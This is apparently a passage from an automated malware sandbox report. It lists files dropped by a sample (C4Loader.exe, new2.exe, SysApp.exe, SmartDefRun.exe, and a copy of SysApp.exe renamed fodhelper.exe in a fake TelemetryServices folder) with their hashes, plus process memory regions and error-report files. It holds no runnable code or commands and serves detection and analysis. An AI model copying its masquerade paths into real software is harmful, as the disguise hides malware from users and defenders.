| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/1344-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/1312-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 990c8e3fc56a2734631b51fc61a6779a |
| SHA1 | 55a16cc67fc52cdf0690387e083955048106d48a |
| SHA256 | d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e |
| SHA512 | f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5 |
memory/1344-164-0x0000000000F20000-0x000000000108C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 990c8e3fc56a2734631b51fc61a6779a |
| SHA1 | 55a16cc67fc52cdf0690387e083955048106d48a |
| SHA256 | d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e |
| SHA512 | f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5 |
memory/4280-167-0x00000000007D0000-0x00000000007F0000-memory.dmp
memory/4280-166-0x0000000000000000-mapping.dmp
memory/1344-172-0x00000000058E0000-0x0000000005972000-memory.dmp
memory/2188-173-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/2208-176-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1344-178-0x00000000060B0000-0x00000000060BA000-memory.dmp
memory/2188-179-0x00000000021C1000-0x00000000026C5000-memory.dmp
memory/4280-180-0x00000000053C0000-0x00000000059D8000-memory.dmp
memory/4280-181-0x0000000004E60000-0x0000000004E72000-memory.dmp
memory/4280-182-0x0000000004F90000-0x000000000509A000-memory.dmp
memory/4280-183-0x0000000004ED0000-0x0000000004F0C000-memory.dmp
memory/2188-184-0x00000000026D7000-0x0000000002814000-memory.dmp
memory/2188-185-0x00000000021C1000-0x00000000026C5000-memory.dmp
memory/4280-186-0x0000000005330000-0x00000000053A6000-memory.dmp
memory/4280-187-0x0000000005B20000-0x0000000005B3E000-memory.dmp
memory/2276-188-0x000001F8EF650000-0x000001F8EF672000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15db1985e91cf3754604b9337a72ca47 |
| SHA1 | 3451b17f81d8f80b33bd0184dc4e19b5be6b1196 |
| SHA256 | 48b46a9ecb43238a8cb32345e55c9d6ae0bedca1d7fc3e0c333211ecc2521ced |
| SHA512 | 39e05c6375eff2d5d1b9d2c0e503e7c53b66be0c62e03312f9979381c1a1b26cedef56fd66c44aed013b6dd2cb36c238bf82ab0ed00eb0a5de4abcede577fe8f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
memory/2276-191-0x000001F8EF860000-0x000001F8EF87C000-memory.dmp
memory/2276-192-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
memory/2276-193-0x000001F8EF880000-0x000001F8EF88A000-memory.dmp
memory/2276-194-0x000001F8EF8B0000-0x000001F8EF8CC000-memory.dmp
memory/2188-195-0x00000000026D7000-0x0000000002814000-memory.dmp
memory/4280-196-0x0000000006B10000-0x0000000006CD2000-memory.dmp
memory/2276-197-0x000001F8EF890000-0x000001F8EF89A000-memory.dmp
memory/4280-198-0x0000000007210000-0x000000000773C000-memory.dmp
memory/2276-199-0x000001F8EF8F0000-0x000001F8EF90A000-memory.dmp
memory/2276-200-0x000001F8EF8A0000-0x000001F8EF8A8000-memory.dmp
memory/2276-201-0x000001F8EF8D0000-0x000001F8EF8D6000-memory.dmp
memory/2276-202-0x000001F8EF8E0000-0x000001F8EF8EA000-memory.dmp
memory/2276-203-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
memory/984-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
memory/3312-206-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c697637a9b17f577fccd7e83a5495810 |
| SHA1 | 04e6054584786b88994b0e0a871562227fe2a435 |
| SHA256 | 54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164 |
| SHA512 | 66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0 |
memory/2228-208-0x0000000000000000-mapping.dmp
memory/2952-209-0x0000000000000000-mapping.dmp
memory/1832-210-0x0000000000000000-mapping.dmp
memory/1020-211-0x0000000000000000-mapping.dmp
memory/1592-212-0x0000000000000000-mapping.dmp
memory/1444-213-0x0000000000000000-mapping.dmp
memory/3508-214-0x0000000000000000-mapping.dmp
memory/4808-215-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
memory/4748-216-0x0000000000000000-mapping.dmp
memory/4808-217-0x000001E7F2029000-0x000001E7F202F000-memory.dmp
memory/4808-219-0x000001E7F2029000-0x000001E7F202F000-memory.dmp
memory/4808-218-0x00007FFE2EB80000-0x00007FFE2F641000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/4804-221-0x00007FF6D6AF1938-mapping.dmp
memory/364-222-0x00007FFE2FC60000-0x00007FFE30721000-memory.dmp
memory/4280-223-0x0000000006AA0000-0x0000000006AF0000-memory.dmp
memory/2188-224-0x00000000109F0000-0x0000000010A47000-memory.dmp
memory/2188-225-0x00000000109F0000-0x0000000010A47000-memory.dmp
memory/364-226-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
memory/2188-227-0x00000000109E0000-0x00000000109E6000-memory.dmp
memory/3568-229-0x0000000000000000-mapping.dmp
memory/364-230-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
memory/364-231-0x00007FFE4C820000-0x00007FFE4C8DE000-memory.dmp
memory/3316-233-0x0000000140000000-0x0000000140029000-memory.dmp
memory/3316-234-0x0000000140002314-mapping.dmp
memory/3316-236-0x0000000140000000-0x0000000140029000-memory.dmp
memory/3316-237-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
memory/3316-238-0x00007FFE4C820000-0x00007FFE4C8DE000-memory.dmp
memory/60-239-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/596-240-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/680-244-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2496-274-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2108-269-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1824-263-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1436-255-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1200-250-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1036-247-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/700-246-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/440-243-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/952-242-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/3316-241-0x0000000140000000-0x0000000140029000-memory.dmp
memory/776-282-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/3044-281-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2776-280-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2768-279-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/596-297-0x000001CFB3580000-0x000001CFB35A1000-memory.dmp
memory/60-302-0x0000027870C00000-0x0000027870C27000-memory.dmp
memory/1036-305-0x000001F0FA740000-0x000001F0FA767000-memory.dmp
memory/4376-306-0x0000022CA82A0000-0x0000022CA82C7000-memory.dmp
memory/2188-310-0x00000000026D7000-0x0000000002814000-memory.dmp
memory/3932-312-0x0000000000000000-mapping.dmp
memory/4992-309-0x0000000000000000-mapping.dmp
memory/700-304-0x000002512EEC0000-0x000002512EEE7000-memory.dmp
memory/440-303-0x000001D729860000-0x000001D729887000-memory.dmp
memory/680-301-0x0000020794990000-0x00000207949B7000-memory.dmp
memory/596-299-0x000001CFB35B0000-0x000001CFB35D7000-memory.dmp
memory/2760-278-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2708-277-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2668-276-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2656-275-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2472-273-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2360-272-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2348-271-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2144-270-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/2996-330-0x0000000000000000-mapping.dmp
memory/1996-268-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1264-334-0x0000000000000000-mapping.dmp
memory/2036-267-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1980-266-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1948-265-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1940-264-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1784-262-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1676-261-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1660-260-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1644-259-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1604-258-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1528-257-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1452-256-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1404-254-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1356-253-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1244-252-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1232-251-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1124-249-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/1056-248-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp
memory/3316-245-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6E7.tmp.csv
| MD5 | 6e5f277667f7d0cab2c5f4cfa5fca45c |
| SHA1 | 85ac85bdcccef50d0c7c95115234de352c8290ee |
| SHA256 | 0017b86e648f0637bc95d8233f90527d0978bd8b6e872f3c9b36b02f468a2397 |
| SHA512 | 29b193891ac2bfa34f5abfc474badd6199aa38693356e067477046b2c2ab69db01c43747eb36faf5158bfec31290f1677c06a74bef052f298f2de7a2c8ee8c85 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7C2.tmp.txt
| MD5 | c9aed76f52a027017779daec81956a27 |
| SHA1 | 44d2f3f6abd8f6f4292af96024eb01fd164602b5 |
| SHA256 | 9b348829cce25a06e216a6a6873af09ab56e6a0f0e1750137589d4465728ab1a |
| SHA512 | c8ade81abce6cf4bc520a2af0f3d9fe4234711610c049cafea246d4d1c4703f25dfd89bdfe53d97131ad364a70611c3702e758099f94b6580916ba0f2b0e75c5 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8DD.tmp.csv
| MD5 | 1186cf2593b61385cee4aa486e01226b |
| SHA1 | c72c23a487dd3652215328eea8a795a2d38b7a21 |
| SHA256 | ec9e3838b54bac87cdaf948df748778540c25facb831d676dd2f569762c590d4 |
| SHA512 | 4e892a2739945cd16ddb8ff4f81fa7064c88dbd1890b589a373da3fd73041da1670a15e2f426b84f039f62d76e3f263adbe3b0e96b9d6145007505910bf34683 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD94B.tmp.txt
| MD5 | 527ccfd0579ae13daa5480c284915152 |
| SHA1 | d14c4d67aa1d549c3d9a15ef7ad6b90178b75c0f |
| SHA256 | 950e034e5b5331db2d3732047a218ea8141a6cdd739e1d237e6d1aae654b219a |
| SHA512 | 22fdb0de06ad073778c73c76fb2a13add1b4f262a983851067da9ff346bad0c8ff591495aad908af15dff790faa9b8e7b259fc0924bd0a67669191375c69ecd1 |
memory/4816-388-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/260-394-0x0000000000000000-mapping.dmp
memory/2428-396-0x0000000000000000-mapping.dmp
memory/2088-402-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F4E.tmp.csv
| MD5 | edc2971adb55fbd56cf0c5abc30b5320 |
| SHA1 | 727c16aa1272ff69df79bb39d5376732084371ca |
| SHA256 | be8845db2d6d5bf7ed462b15ca42c251781e2548ca02ebe48bebd31bd9625bdc |
| SHA512 | 701af5934f884a834978272c747f349bf1cecbaedbe61907747d677f892a0f15ba2e68d8fad9fc5ce84baf35c47d745e73c0f468f39293f5556fd6db7ea6f435 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F9D.tmp.txt
| MD5 | 912a84e5c88dccb7970379f76b9f7767 |
| SHA1 | 28ddca0504c6f4dc3eccdb23cde6b320bf95da13 |
| SHA256 | 1de4f778d16abe418d9cfe091901fbe1a21abd471547f2505fc54d5f972a2558 |
| SHA512 | f3dea1dffdea6268182ee93a1a81bf684a78cfc5967bb01b4bc442c44bde64e76db456fe590b04d7a8d90c66552018df7c0c0f2a438a8925f80b5dd9649cd1e6 |
memory/3748-411-0x0000000000000000-mapping.dmp
memory/4912-416-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2386.tmp.csv
| MD5 | f4ef2ef0a603c309632d8a19ccd86306 |
| SHA1 | 8238df9d33255b1049d0df1ed7334d5b8a7da588 |
| SHA256 | c7338ff8c45574e1c38005f73dcab005f2b8c925501500cc3776dd0ce9b5bdce |
| SHA512 | 927d0d9c984afc6e3f73dcdb2755ee35ac43883149677209aeec02acfdc8b1609e652a3baef282853b83e925cd962fd41a024fc410897bc010c9dc7fd16ef9d4 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER23D5.tmp.txt
| MD5 | 533db9014a445e023c9d728c87d72d41 |
| SHA1 | 2ac61fb34420dde320118e36808aad149ce1bdeb |
| SHA256 | 07eac1d651c80eea3858bbd2d6bf8eb6a2ebc6fab8e6e9f72eb4af58d34860fa |
| SHA512 | d94f1e67dc8bf00a5675bb953ffd87e25293bfbb8a671a2cae76f4d861ded9431a09f835b8fe1c4a393423d715b27cdebf00c7cf10409052f9c68ccf27aecca0 |